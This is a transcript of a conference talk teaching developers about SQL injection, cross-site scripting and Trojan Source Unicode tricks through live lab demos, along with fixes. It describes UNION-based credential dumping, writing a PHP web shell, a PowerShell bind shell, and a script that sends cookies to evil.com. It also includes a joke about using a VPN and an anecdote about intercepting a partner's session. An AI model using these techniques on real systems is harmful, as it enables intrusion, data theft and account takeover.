Hacking for Developers, that's you. Who of you this morning has seen my keynote? Can I see some hands? All right. I want to do some introductions, but let's leave the politeness behind us. So today, I'm going to focus in my live demonstration, I'd like to focus on a few very common vulnerabilities that you might all know. You may have heard about it. You may even have caused them in your code. And they're really familiar. But have you really seen an exploit working on those? Have you really seen what you can do as damage from a hacker's perspective? I'm trying to go a bit deep here, so bear with me. But I think it will be an interesting session for you to learn to see the hacker's perspective from the exploit that you all seem to know. So a little bit about myself. No fancy pictures this time, because I want to ram and go fast on this technical session. So, software engineer, more than 20 years of experience, also an architect, also Scrum Master and mentor. Developed my passion for cybersecurity around 10 years ago when I found that breaking stuff is even more fun than building that. And I was also a CISO. Started my own company, you heard about that, Scion. And currently I'm also working for ABN AMRO as a secure coding consultant. Spoke about common vulnerabilities. SQL injection. Who has heard of SQL injection? All right. So, sorry about that. Who has heard of cross-site scripting? Oh, my God. So, no, I will be telling you something new. Don't worry. Because usually, if I speak to developers about SQL injection and cross-site scripting, it's like, yeah. We know about this. We've heard this before. We've seen it all. And I've seen the red flags in my code. Leave me alone with this. Tell me something I don't know. Then why is it that it's still number three most impactful vulnerabilities? It happens a lot. All these companies that you see here have been hacked over the past years. In their software had vulnerabilities like SQL injection or cross-site scripting. So they're very prevalent. So everybody knows about them. So how come they still exist? Right. So, Firoco did some research. SQL injection is in 24% of all the applications. Well done, because the last time they did the research, it was in 26% of all the applications. So there's a line there. And for cross-site scripting, it's in 40% of the web applications. It's quite a lot, actually, if you think about that. Especially since you all know about these vulnerabilities. I love this session, because this is where we go hands-on. And I am demonstrating some techniques. No, that don't try this at home, because even if you have the right intent, if you don't have permission on the system, hacking is still illegal. All right, you can get in a lot of trouble. Or use a great VPN, that's also good. So, we're in a Java conference. Who recognize this, something similar like this? It's Java code, right? So obviously. Who can tell me where the error is here, the issue? See some hands. Line 14, what's going on with line 14? Concatenation, right? Immediately, spot on. So, what's happening here, unvalidated input is concatenated right into a SQL string. You all know this one, right? This is, I wouldn't say basisschool stuff. But yeah, this is what the basic vulnerability of SQL injection looks like. You would be surprised how often we still see this. This section is about SQL injection. No surprise there. So what can I do as an attacker? I can manipulate or I can read sensitive data. I can modify or delete data, or execute commands on the DBMS. So what I actually do as an attacker, I modify the SQL query that was designed in such a way that I get more data out, or I make the system do something that it was not designed as. And this is basically hacking. I'm letting the system do something for which it was not designed. Consider this. Who knows this kind of website, by the way? Who recognizes this? Bonus points if you recognize it. It's from a front page of a very known. Close. OWASP, the OWASP site. Open Web Application Security Project. If you don't know this about this, there's a slide at the end about that. I borrowed their image, and I was hoping that maybe one of these people was in the room that said, hey, that's me. Yeah, would be cool. All right, so web.com/home/2. So that means that there's a call, if you do this, there's a call, a request with parameter 2 that requests page number 2 from the database and, for example, gets the title back of the page about us or gets the content back from the page that you can imagine. How does this exactly work? So on the top, you see the browser. Then you see the SQL statement that's being formed. Then you see the database that takes out the information, what's happening on the database layer. And then underneath, you see what the website looks like. So we start out with 2. This is the output as it was designed by the developer. And the output is about us. So SQL query could look like this. Select page ID, title, content from pages, where page ID equals 2. And the database has a table pages, row 2 gets returned, sent to the web page, who actually displays it in the right context. Now, we start generating an error, because that's not number one that you want to do. Let's see if I can make the website do something that it was not designed to. Maybe the developer didn't do the error handling correctly. I make an apostrophe. Let's look at the SQL statement that's being made after I insert the apostrophe here. This is syntactically incorrect SQL, so it will probably generate an error, which is also confirmed by the DBMS, and it outputs an error message. If you sometimes go on the web and you do something weird, you see an error message coming back, bad stuff. I see somebody nodding, recognize it, right? It gives us a lot of information, especially if the error is just blatantly put back to the website. So you have your query here. It's actually coming back from the website. You have your query here. This is where my query is gone. It's really helpful. This is where my query went wrong. I know now that it's using a SQLite database management system and also using the Spring framework. That's a lot of information as a hacker because, as an attacker, I now know which SQL query I need to do. I know how I need to talk to the database, SQLite. And I can also do stuff with Spring. So the union. I guess you all know about SQL, right? So what I try to do is I suppress the normal output of the website because I don't really need to know anything about the page. I really want to do something else with the database. So I union the query that's being made, union it with select ABC. That's what's happening. The first select statement doesn't return anything, but it will be unioned with my own table, select ABC. Union with nothing is ABC, and it will be returned. ABC will be returned to the website. This is very useful because I know that because not all columns need to be returned, right? So in this case, the title I know is on the second column, and the content is the third column being returned. And this I can use to exfiltrate data from the database. Because if I know there's a users table, I can actually get the username and password from the specific table using the columns that are available to me, the second and the third. Looks like this. Union select a username password from users, and then the database. Right. Of course, you need to group concat something because sometimes the columns need to be merged together to be able to make them all visible. But this is the basic idea of exfiltrating data. Of course, this is also possible, drop table users. Can happen. Often nowadays, you see that there's protection, that you're not allowed to make multiple statements at the same time. But there's still old configurations that it still works on. Trust me, it's not a pretty sight, literally. And then you just drop the table, and your user's database is gone. So this is what it looked like. This is how you should fix it. Prepared statements, using prepared statements. Maybe you all know about prepared statements, but what the thing does is that it separates the command from the data. So the command is the select state, and the data is the page ID. And what it does here is on compile time, it already separates these two. So it will never be confused about where the data goes and where the command goes. So I cannot enter any command in the data because it will be interpreted as data. This is how you do it. We sometimes see developers do this. Hey, I'm using prepared statements. Now what? I'm doing the right thing, right? So, who thinks this is okay? Yeah, I kind of spoiled this, right? Yeah, no, it's not okay. Because you're still concatenating data. There's no, what first is being done is it's building this SQL statement up, and there could be a command in here as well, right? And then it starts building the prepared statement. So you will just be partially safe, so not safe at all. SQL injection demo. This is actually, by the way, I heard it's a Yugoslavian. I'm not sure if anybody's from Yugoslavia. Confirmed? Yes. Tablici, right? I heard it. So, yeah, Tablici. So it selects this license plate, drop database, license plates. Creative. All right. So what I made, I borrowed from OWASP SKF, Secure Knowledge Framework. Really recommend this. They have a large set of vulnerable pages that you can try specifically for specific vulnerabilities. I modified it so I can use it and show you what's going on. So a small modification on my side here. Let's see if I can do anything with this. This is the page that I showed you during the presentation. If I press welcome, hope you can see it in the back. There's a one here. Who can you in the back, can you see that? I see nods, great, awesome. So page one is returned here. If I click this, page two is returned. It's very simple. But let's see if I can generate an error here. Apostrophe. Bam. Right, here's where all the information comes out. You have this select statement. You see that there's SQLite. It even says, hey, you're doing something with a quote that I don't recognize. So you already get a lot of hints here. Sometimes you have to do blind SQL injection. It's a different cookie, as Vergaal would say. We're not going in there. But let's see if I can do something like one here. Let's consider this page that I'm completely blank as a hacker. I know there's SQL injection here, but I now need to know how many columns are available. So what I can do is order by five. This means that it will try to order the result by column five. There are less than five columns, so it doesn't recognize the fifth column. That's what it says here as well. SQLite is even more verbose than MySQL, because it really says, hey, I expect three columns here. Now what's going on? So let's do order by three. That's the maximum amount of columns, and there's no error anymore. So I know it's syntactically correct, and now I can play around with this. Because if I do minus one union select one, two, three, then you see what's going on. So two and three, two is a title, apparently, something like that, and the three could be the content. So now let's see what happens if I do SQLite version, so I can get some. This is actually a call that I can make to the database management system, and it's returned as well. So that means that I've got exact contact with the DBMS, and now we can get cracking. Because what happens, what I would like to know now is which tables are part SQLite master, SQLite master, where type is equals table. So there's some system tables available in SQLite, and because I know that SQLite is the DBMS, I know how to get it out, and I want to query all the tables, the table names that are available to me. Bam, something went wrong. What did I do wrong here? Ah, group concat. Hey, we're pair programming here. Eh? If you see me making a mistake, please say so. All right, so you see users and pages are the tables available. Of course, I'm very curious about the users. So let's see what happens if I, how many and which columns are available here. Pragma table info from users. Bam, username and password. So now I know even the columns that are available. So the only thing I need to do now is group concat, username, group concat, password from users. Bam, harvested the database. Who recognizes these strings? Arjen. Hashes, right? What do you know the kind of hash? What do you expect? MD5. Probably, right? MD5. I don't have internet here. My Wi-Fi is down. So, but these are very weak passwords. And if you use a very weak password, the hash is probably somewhere on the internet. You can easily look it up. So this is how we harvest the database. Let me also show you what it looks like if I fixed it, because I fixed the backend. And let me show you what it looks like if I go to port 5001. Yeah, question.
So this is all possible if the user, if you're connecting to the database with the user that has all this access rights to access the database.
It's important. It's important, yes. But usually, the website needs to have a connection to the database, which has certain rights. And maybe if there's a login page, it also needs to have access to the login data to be able to compare that. Right, so it's, but it's a, that's a very important thing, because least privilege, what you're talking about here, is a very important principle. Sorry. So I'll make this brief. Click on this. Oh man, I hope I'm not losing my voice here.
Too much talking.
Less talking, more hacking. Sorry about that. See, it says page not found. If I do something like -1, union, select 1, 2, 3, it just says page not found. Because it's trying to get the page, -1, union, select 1, 2, 3, it doesn't exist, right? There's no command here, it just does the separation of the data and the command. All right, unwilling from the time, let's go in deep dive from SQL injection. So you got the basics. Let's turn it up a notch. Let's go in Super Saiyan mode, SQL injection. Bear with me here, because it's getting a bit more more technical. I'm also not using Java. Very sorry about that. I'm using PHP, because it's much easier to exploit, right? So just trying to make my point here. So what I'm doing here on the right, I'm showing a Windows machine, because usually you see hackers doing something on Linux. I think it's funny to show also something on Windows. There's a MySQL backend, and there's PHP running the web server. And of course, we are the attacker here. So what we're trying to do here, via SQL injection, I'm going to create a PHP file on the web server. And the PHP file on the web server is able to receive a command from me that can be executed. That's remote command execution, actually. So what I do is I can send a PowerShell script to the PHP, which will be executed on the back end of the Windows machine. And that will start a listener on a specific TCP port, which I can connect to get a low-level shell. Right? And then I can, as a hacker, I can actually take over the machine. Just want to show you here that SQL injection is not about *1=1 to log in, right? Because everybody knows this. You can go very deep if configurations are wrong. I'm not going to type all these things out, because I prepare it, and it's a big command. So I'll just walk you through the basics of the technicalities here. So it's SQL injection. What I'm doing here, -1, right? So I'm not curious to what's really coming out. Union select, and then a specific string. This is the PHP that will be loaded into the file. Into an out file, and then a specific file path, /cmd.php. The out path, of course, needs to match about what the web server is able to provide to me, but then it will be in cmd.php. Then, don't be scared, this is the PowerShell. What it does here, it creates a bind shell. That's the listener. So, starting a PowerShell, giving some commands, it creates a TCP listener on my local host machine on port 555, and anything I will send over that channel will be executed, and the results of that command will be sent back to me. That's the basics. I'm using Netcat. Who's familiar with Netcat? Jan, for sure. Yeah, a few of those. So Netcat is a low-level tool that I can use to connect over TCP. So if I make a connection on a TCP port, I'm able to send some plain text, which would be, for example, HTTP, really regardless of the protocol that's going over the line. Let's demo this. And now, let's all say a small prayer to the demo gods. All right, Super Saiyan mode. So this is my fantastic form. I'm using this fantastic form, the PHP site, to demo this. I'm going to a form, and I click on this. It's not really relevant yet what it does, but you see there's ID equals 6. So, of course, I did some reconnaissance. I do something like order by 5, and you see that my SQL is giving me a different error. It says unknown column 5. Well, I can do a little game of hoger lager. And order by 3 works, and order by 4 as well. So if I do something like, then I know that there are 4 columns, union select 1, 2, 3, 4, and they're all there. So SQL injection is there. So now, as you can see here, I copy this. An extra step I'd like to make with you is that, of course, I need to do some reconnaissance, because where do I store the CMD PHP file? I go to this forum.com, and you see that XAMPP is running on the back end. XAMPP is running Apache, MySQL, PHP, and Perl. If I do some research on XAMPP, I know that the XAMPP could be the root folder. Underneath is htdocs, and underneath htdocs, that's the root for all the web servers I'm providing. And from the URL here, I see that BTS Lab is the root for my forum. So if I would like to have a CMD file accessible here, it would be XAMPP / htdocs / btslab / cmd.php. That would be the path I would get out. So let's try that. And then fingers crossed, bam, error. Oh my God, something went wrong. Or did it? Now let's go to the backend. I'd like to show you the backend as well. It's not for now yet. Hey, there's a cmd.php file. So it got created on the root, especially next to the, there we go. So that's now being served via the web server. Let's see what happens if I go to cmd.php. Expects a command parameter, fair enough. The command equals dir, because it's a Windows machine, dir. So I'm able to execute a Windows command on this machine, low level. I can read any file now that I want. I can execute any Windows command that I want, but I want to take it up a notch, which is the PowerShell, right? I have it here, URL encoded. I just copy-pasted. You all saw what's happening, what it is about. Paste it here, and you see nothing's coming back here, because in this session, it's actually listening now. It's listening to any incoming requests. So what I'm now doing, I hope you can still follow me, netcat, and then, thank you. Nice, pair programming, nice. Where is it? It should be on victim.com, 5555. Bam, shell. So now you see I'm actually on the back end of the Windows machine. I can do whatever I want. Cat. Type, of course, because we're in Windows, secret.txt. Can read any file I want. Go to users. Hey, Koen is there, familiar guy. I think I saw his keynote this morning. There we go, cookie stealer link. So now I'm on the desktop. I want to show you that this desktop currently is completely empty. And now we're going to give him the shock of his life. You are pwned to pwned. .txt, and then start pwned.txt, and why not, I start the calculator as well. Right, just because I can. Now if I switch back, you are pwned. There you go, and the calculator is started. Just to show you that you can do a lot of nasty stuff here. I can even make a pivot into the network, because I already took over this machine, maybe it has new network connections, I can dive into a little bit deeper as well. That concludes our SQL injection. All right. Next up, more fun. Who recognizes a mistake here or a problem here? Shout the line number. 13. Why?
There's no way to foundation.
Nice. Nice one. Which vulnerability would it lead to? You have two and you already saw one. Which one is it? Process script, very good. Yeah, exactly. So what happens here, there's no input validation, and there's no output sanitation, because that's the most important, right? the input, what you're giving here, the name, is a string, that's output directly back to the model without any sanitation, which means if I can write any JavaScript or HTML, it will be written like this to the website, and the user who reads the web page will get it executed. Cross-site scripting. What I can do here is I can just take over a machine, take over a victim. Anybody who browses this website can access the user data, do commands, whatever this user has as permissions on the website, I can actually do that as well. So how does this work? Just go briefly over that. I don't want to go into depth too much. You have a vulnerable web page served on a web server. There's a database here as well. And there's an attacker, of course. The attacker, can imagine the forum post. We're going to use it again. You can imagine the forum that I wrote. You inject a script instead of a normal command. Instead of a normal comment, as you do on the forum. So the comment gets saved in the database, but since the comment is now a script, the script gets saved in the database. And now we have Adam over here, browse the same forum. Try to load the page, request the data from the server, and the data with the script is served back to Adam. And because he gets it in the browser, that's executed on his behalf, right? So this way, if I get the script that will be executed by the user who executes the script. This is what we saw. Would this be a good way to sanitize it? I see not. Don't laugh about it, because this is what we saw happening sometimes. Yeah, I replaced all the divs. What can go wrong, right? So, no, divs is not enough, because we're talking JavaScript here as well. Then about this. Is it enough? No. Why not?
JavaScript,
just the brackets, right? Yeah, and even the brackets, you can just, if I do some encoding on that, it will still be there. Yeah, completely right. So what I recommend is to use a framework-specific encoder, right? For example, for Java, it would be OWASP, the OWASP encoder. It's a really good one. If you check out, there's a lot of things you need to take into account with the cross-site scripting, also your web application firewall, etc. It's massive, because there are a lot of dangerous contexts as well. Browse this site, OWASP.org, and check out the cross-site scripting prevention cheat sheet. I could talk for an hour about cross-site scripting, but I don't want to bore you. Now we have this lead. Let's see how we can hack this. The demo, cross-site scripting demo. All right. Going into Chrome here. Here we go. No submission. There we go. Here we go, back in. So you all know there's only one input field. Where do you think he would enter that? Of course here. Script, alert one, script. Bam, cross-site scripting, right? This is what you saw. Also, image source equals X on error equals alert one. Bam, oops, too fast, it went. Payloads all the things, nice GitHub repository. Payloads all the things, check out cross-site scripting. There's a, like the word, plethora of ways to exploit cross-site scripting. All right. This is basically it. So what I did actually, of course, there's an alert pop-up. But what I actually did, let's briefly do this. Script document.write document. I'm not even sure if there's a cookie here. Oh yeah, there's a cookie, bfook, all right. Yeah. So there is, so what I did is I injected the script that's just executed on my behalf. This is not so exciting because it's just hacking myself, right? It's reflective, you can do a lot of nasty stuff with that, but let's turn it up a notch. Cookie stealing via cross-site scripting. Cookie monster, all right. I hope I'm not underestimating you here. But once I asked the developer, do you know what exactly a cookie does? And the answer was, yeah, I kind of, because I also have to reject or accept it, right? That's the bothersome thing. Let me briefly go over what a cookie does. So you have Adam sitting here. And you have the web server. A web server uses HTTP, which is stateless, which means it's like the goldfish of internet technology. It forgets anytime, every time you need to reconfirm that you're that. The web server can have a user database containing profiles or baskets. Can be a large amount of data that you don't want to have landing on your web server all the time. So what it does, Adam does some authentication to the web server, and then the web server, assuming he's authenticated in the right way, the web server gets Adam's info out and stores that in a local session. Gives it the session ID as a quick reference, and then sends back Adam, here's your cookie, that's the session ID, and Adam stores it in his browser. So this is what a cookie basically does. Anytime he browses the website or does any action on the website, remember, it's the goldfish. You need to feed the goldfish every time you need to feed it the cookie. And anytime he does anything on the website, the web server knows, hey, this is session 12345, that must be Adam. In comes the attacker. So if I would be able to steal the cookie of Adam, 12345, I can feed the goldfish as Adam as well, right? And I can actually do anything that Adam can actually do on the website as well. Cookie stealing. So this piece of JavaScript creates a new image called I, and it says the source of I is evil.com/cookiestealer.php c equals escape document.cookie. What it does here, the reason I use an image, because if I inject the script immediately on the website, it gets executed immediately after the document loads. So the user doesn't need to click anything. Maybe he sees a broken image, but then it's already too late. So what it does, it makes a connection to my cookie stealer script. The cookie stealer script reads the C from the request, which is the cookie, reads some additional request information. I will always like to send an email as well to myself, like, hey, some fish bit. And then append that information to a text file, cookies.txt. And that way I can harvest all the cookies of everybody who visits the specific website. Let's see how that works. Right, still in Chrome. Going back to my fantastic forum. And here's, oops, he's still waiting for me. Oh, no. There we go. So let me log in first. On the left side, I log in as moderator. Moderator. And the other one is attacker. If you ever want to hack a system, don't call yourself attacker. Got in trouble with bol.com, the server here. The entire company got shut down from the internet. At least I could not contact bol.com because they saw something weird happening. Because I called myself attacker. Stupid stuff. Anyway, enough about the musings. So what you see here, there's just a forum. You can create some posts here. The moderator already created a post. It's fantastic over here, right? It's just simple format, you can see. Now I'm an attacker, malicious as I am. I say, hey, this is your cookie. Document write document.cookie script. See what happens. Hey, this is your cookie. As an attacker, I look on the right side. And indeed, the cookie is logged back to the web server. PHP session, this is my session ID, starting with VM9OV something, right? Now I refresh the page on the moderator side. You see there's a new page, and I'm a moderator, and say, finally, someone on my forum. Let's see what happens. Hey, this is your cookie. It's completely different. No surprise there. Two different users, two different cookies, two different atoms, two different goldfish. But now, of course, as an attacker, I can look on that side, but usually I don't have the access to see what the moderator is doing. So how would I be able to steal this cookie? Well, you already saw the answer, and that's what's happening here. Of course, I stole with Hive Friend. That's much more friendly. I'll save you the copy-paste stuff I do. Just to show you, this is the script that I have here. It's exactly the same as I showed you, right? So what I do here, I paste this in. Post, and there's Hive Friend. Let's go to the forum as a moderator, refresh. Hi, friend. Here is this as well. Let's look at the back end. We're still pwned, but I'm also using this as in my evil cookie stealer website. Here's the c.php, the cookie stealer PHP file. If I look at that, it gets the C parameter, stores it in the cookie variable, takes some other stuff like IP addresses, stores it in the cookie.txt, optioneel, it's Dutch for optional, send notification email, so I know the fish byte, bit. That's Dutch for bit. Of course, as an attacker, I want to see if it works. So I click on this, no content. Hi, friend, but no content. How disappointing. But if I go back to my backend, I see the cookies.txt file is there. Click on it, and you see my own session. Well, surprise. What do you think would happen if I click as a moderator? Hi, friend. Click on it as a moderator, nothing happened. Big disappointment again. Go back to the cookies, and I see the second fish bit. But now, as an attacker, I know the session cookie of the moderator. So if I now go back as an attacker, go into my developer tools, storage, that's where the cookies reside. You see I hope you can see it, but trust me, this is my own cookie. Change it, paste the cookie of the victim here, and make a new request, because that's the goldfish again. Make a new request with a new cookie, refresh, and now I'm the moderator. Forum, and I can say, pwned, blah, blah. I can actually post, make a post on the moderator. Actually, I can do anything on the website now that the moderator can do as well. Once I did a man-in-the-middle attack, and I tried that at home. My girlfriend was actually ordering something on Albert Heijn. I did a man-in-the-middle attack, and I posted something here on her behalf in the shopping basket. Because, yeah, sure, I like my beers as well. So this is how you deal with that. That was the cookie stealing part. Now something to wrap this all up. What do you think is the output of this piece of code? Okay, let's do it differently. Who thinks the output is you are a user? Right? Yeah, you're now very skeptical, right? Yes, he probably isn't the one that he says thinks he is. If you look at the code, right, access level equals user. If access level equals not equals user, then it's an admin, obviously. If it's access level something else, then it must be the user, right? Wrong. This is what happens. You are an admin. So how is this possible? I'm looking at my code here, and it's executing something else. The answer is bidirectional Unicode characters. There's a vulnerability. It's really ancient, actually, but it has been assigned a CVE, common vulnerabilities and exposures. It's a vulnerability, a unique number for a vulnerability, at the last November. I wrote a blog on that. You can find it on scion.nl. How this exactly works is also a GitHub repository. I'm tricking the IDE to displaying something else than to what the compiler is seeing, because the compiler is able to interpret the bidirectional characters, but the IDE just doesn't show them, right? Providing the different IDE, because this is live. I got this from the Visual Studio Code IDE that doesn't display it really well. You see there's something wrong with the syntax coloring, because this is still a string, still part of the string. It's not green, so that's a hint. But you see that IntelliJ is doing a reasonable good job, because if the quotes here are still placed in the wrong way, because they should be somewhere here. So how does this work? It's a bit of mumbo jumbo to me as well, because it revolves around languages that read from right to left. But I'll try to explain how it kind of works. If you use the sentence, quick brown fox jumps over the lazy dog. Jesus, what a sentence. So this sentence, if you do use the right to left override character, just after, oops, I have to wrap it up, I think. No applause yet, I'm not done yet. So the quick brown fox jumps over the lazy dog. If I if I enter this bidirectional character exactly at this place, look at the bottom, it will garbage it. It will turn it the other way around, right to left, right to left. So if I use a different bidirectional character, the quick brown fox jumps over the lazy dog, and I place these two right to left embedded characters here, this is what happens. It swaps these two pieces of text. And then, if I place the third one, you can place this one. So even though I'm writing, I'm seeing the quick brown fox jumps over the lazy dog, with the right placement of bidirectional characters, I can actually make it read, the lazy dog jumps over the quick brown fox, which is pretty interesting, especially if you look from it from an IDE perspective, where you all trust your IDE, right? It's the little child that you work with on a daily side. I see Arjen shaking his head. Yeah, fair enough. So, because of the time, I cannot demonstrate this live, but please check out the GitHub that I have. You can play around with that. There's some JavaScript examples as well, some Python, some Bash, some Shell, and I also will add the Java examples that I put here. Yeah, I can ask you what would be the outcome here, but you're very skeptical now. So, good job being skeptical here. So, the amount equals to 100, and generally, this is comment, so I can ignore this. And the output line would be amount equals 100, right? No, it's 30, because that's part of the code is actually getting executed. The amount is 30. This one is also interesting. Consider an open source project in which you have a large number of methods, and you insert a new method called demo. And you call it demo because it was already called. And it's so big that you lose the oversight here. So yeah, you think it could be okay. This is okay, it would be the original method. You just insert a new demo, and it works. So what could go wrong, right? This is evil is actually the output here. And that's because it's a Cyrillic E. It's also a Unicode character. And you often see this happening on domains. So if you have abnamro.com, and you have ABN AMRO with a weird Unicode equivalent of an A, you would not see the difference, but it would be still a different domain. And this is how attackers work as well. So, how to deal with this Trojan source stuff? Be careful of your sources. If you're in your browser and you browse Stack Overflow and you like to copy-paste, I'm a developer, I like to do that as well, still be careful of where you copy-paste your sources from, because these bidirectional characters also get copy-pasted in your IDE, and you need to make sure that these are actually present, and you get notified of them. And use an IDE that actually notifies or displays about the presence of them. Just after the CVE got exposed, neither IntelliJ or Visual Studio did a good job on it. It took them a few days, I think 2 days for IntelliJ and a bit longer for Visual Studio Code, to actually notify the user that there is actually something wrong with their code that they might not expect. What we also did, you saw my keynote, the repository scanner that we have detects these kind of characters as well. Because, yeah, they might be completely legit, but you want to make sure that it's being used like that. So we have a discussion with the developer and say, why did you use these bidirectional characters? Are you aware of that? Okay, final slides. Nice within the time. So, OWASP. If you don't know OWASP yet, go visit it. I think it's one of the most important resources you can have as a developer to perform secure coding. They have a lot of flagship projects. They have the Security Knowledge Framework. I see pictures. Yeah. So, Secure Knowledge Framework, and there's a lot of knowledge there to guide you on how to pen test as well. Deliberately vulnerable applications, so you can go hacking with permissions. If you want to get started with hacking, quite often get the question, so how do I actually get started? Because I'm interested in cybersecurity. Of course, come visit, right? Still looking for developers that have an affinity with cybersecurity. But also try HackMe. If you really want to go learning paths, get a guided scenario on how to hack, this is a very valuable one. But also Certified Secure. It's Dutch. It's made by a Dutch company. And they have really cool tutorials for beginners. And actually, that's the one site that got me into cybersecurity. And of course, Hack the Box. It's one of my favorites, this one. Who knows Hack the Box? Who plays around with Hack the Box? Arjen? Yeah, for sure. Nice. Yeah, cool. So you know how difficult it can be, right? You need to really bang your head. But trust me, the thing, if you look at the hacker, you think it's all, you may think it's all easy, but you don't see the struggle that they had. So Hack the Box is a real good learning environment for that. If there are any questions, I know we're out of time. Just hit me on, come here, and we can discuss anything. But in the meantime, I don't want to take away your next session. So thank you for your attention.